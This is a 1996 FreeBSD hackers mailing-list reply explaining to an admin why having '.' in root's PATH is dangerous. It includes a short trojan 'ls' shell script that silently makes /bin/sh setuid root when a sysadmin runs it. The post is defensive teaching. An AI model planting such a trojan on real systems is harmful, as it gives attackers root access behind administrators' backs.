From owner-freebsd-hackers  Tue Jun 25 00:28:29 1996
Return-Path: owner-hackers
Received: (from root@localhost)
          by freefall.freebsd.org (8.7.5/8.7.3) id AAA26640
          for hackers-outgoing; Tue, 25 Jun 1996 00:28:29 -0700 (PDT)
Received: from MindBender.HeadCandy.com (root@[199.238.225.168])
          by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA26603;
          Tue, 25 Jun 1996 00:28:21 -0700 (PDT)
Received: from localhost.HeadCandy.com (michaelv@localhost.HeadCandy.com [127.0.0.1]) by MindBender.HeadCandy.com (8.7.5/8.7.3) with SMTP id AAA24988; Tue, 25 Jun 1996 00:27:00 -0700 (PDT)
Message-Id: <199606250727.AAA24988@MindBender.HeadCandy.com>
X-Authentication-Warning: MindBender.HeadCandy.com: Host michaelv@localhost.HeadCandy.com [127.0.0.1] didn't use HELO protocol
To: -Vince- <vince@mercury.gaianet.net>
cc: Mark Murray <mark@grumble.grondar.za>, hackers@freebsd.org,
        security@freebsd.org, Chad Shackley <chad@mercury.gaianet.net>,
        jbhunt <jbhunt@mercury.gaianet.net>
Subject: Re: I need help on this one - please help me track this guy down! 
In-reply-to: Your message of Mon, 24 Jun 96 23:32:55 -0700.
             <Pine.BSF.3.91.960624232727.21697c-100000@mercury.gaianet.net> 
Date: Tue, 25 Jun 1996 00:27:00 -0700
From: "Michael L. VanLoon -- HeadCandy.com" <michaelv@HeadCandy.com>
Sender: owner-hackers@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk


>> 2) The Cracker made a trojan script somewhere (usually exploiting
>>    some admins (roots) who have "." in their path). This way he creates
>>    a script that when run as root will make him a suid program.
>>    after this he has you by tender bits.

>	Hmmm, doesn't everyone have . as their path since all . does is allow
>someone to run stuff from the current directory...

Assume root has "." in its path.  Hacker puts this little script in
his dir, maybe also in /tmp/; it's called "ls" (imagine the
coincidence), and it's executable by all:

	#!/bin/sh
	chown root /bin/sh > /dev/null 2>&1
	chmod u+s,a+x /bin/sh > /dev/null 2>&1
	ls $\*

Then sits back and waits for the sysadmin to come along and type "ls"
in one of those directories.

Pop quiz: what is the result?

-----------------------------------------------------------------------------
  Michael L. VanLoon                                 michaelv@HeadCandy.com
        --<  Free your mind and your machine -- NetBSD free un*x  >--
    NetBSD working ports: 386+PC, Mac 68k, Amiga, Atari 68k, HP300, Sun3,
        Sun4/4c/4m, DEC MIPS, DEC Alpha, PC532, VAX, MVME68k, arm32...
    NetBSD ports in progress: PICA, others...

   Roll your own Internet access -- Seattle People's Internet cooperative.
                  If you're in the Seattle area, ask me how.
-----------------------------------------------------------------------------